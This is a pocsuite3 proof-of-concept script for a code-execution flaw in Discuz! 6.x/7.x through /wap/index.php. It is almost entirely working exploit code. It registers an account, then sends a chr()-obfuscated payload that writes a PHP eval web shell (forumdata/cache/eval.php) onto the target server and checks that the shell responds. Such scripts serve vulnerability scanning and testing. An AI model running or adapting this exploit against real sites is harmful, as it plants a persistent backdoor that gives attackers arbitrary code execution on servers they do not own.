Discuz! 7 /wap/index.php 代码执行漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re import time from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1199' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2008-11-08' createDate = '2013-12-09' updateDate = '2013-12-09' references = ['http://huaidan.org/archives/2523.html'] name = 'Discuz! 7 /wap/index.php 代码执行漏洞 POC' appPowerLink = 'http://www.discuz.com' appName = 'Discuz' appVersion = '7#' vulType = 'Code Execution' desc = ''' Discuz! 6.x/7.x 存在$_DCACHE变量覆盖漏洞，如果网站开启了wap注册，将可以直接写入PHP文件至服务器。 ''' samples = [] install_requires = [''] def _verify(self): result = {} headers_fake = {} headers_fake['User-Agent'] = 'Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1' headers_fake['Content-Type'] = 'application/x-www-form-urlencoded' now_t = int(time.time()) key = str(now_t) target = self.url + '/wap/index.php' post1 = "action=register&username=" + key + "&password=" + key + "&email=" + key + "@360.cn&_DCACHE=1" reg = re.compile("logout=yes&formhash=[a-z0-9]{8}&sid=([a-zA-Z0-9]{6})") content = requests.post(target, data=post1, headers=headers_fake).text try: res = reg.findall(content) except: return self.parse_output(result) if not res: return self.parse_output(result) sid = res[0] post2 = "stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid=" + sid + "&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}" requests.post(target, post2, headers=headers_fake) shell_addr = self.url + "/forumdata/cache/eval.php" r = requests.get(shell_addr) if '80vul' in r.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = shell_addr return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): return self._verify() def _shell(self): pass register_poc(DemoPOC)